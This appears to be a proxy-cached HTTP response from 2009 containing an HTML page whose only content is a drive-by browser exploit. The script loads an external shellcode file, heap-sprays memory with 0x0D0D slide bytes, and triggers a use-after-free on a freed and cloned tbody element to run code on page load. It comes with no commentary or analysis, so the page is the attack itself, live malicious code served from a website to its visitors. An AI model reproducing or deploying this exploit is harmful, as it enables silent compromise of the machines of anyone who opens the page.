HTTP/1.1 200 OK
Content-Length: 685
ETag: "098c6de97c91:645"
Date: Thu, 26 Feb 2009 05:29:41 GMT
Last-Modified: Wed, 25 Feb 2009 06:00:58 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.sll9012.cn/a1/ss.htm
X-Polipo-Date: Thu, 26 Feb 2009 05:40:37 GMT
X-Polipo-Access: Thu, 26 Feb 2009 05:41:13 GMT

<script src="xmybrx.js"></script>
<script language="JavaScript">

var array = new Array(); 

var ls = 0x100000-(mybrmybr.length*2+0x01020); 

var b = unescape("%u0D0D%u0D0D"); 
while(b.length<ls) { b+=b;} 
var lh = b.substring(0,ls/2); 
delete b; 

for(i=0; i<0xD0; i++) { 
	array[i] = lh + mybrmybr;
} 

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();//
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody"); 
o1.click; 
var o2 = o1.cloneNode();	
o1.clearAttributes(); 
o1=null; CollectGarbage(); 
for(var x=0;x<a1.length;x++) a1[x].src=s1; 
o2.click;
</script>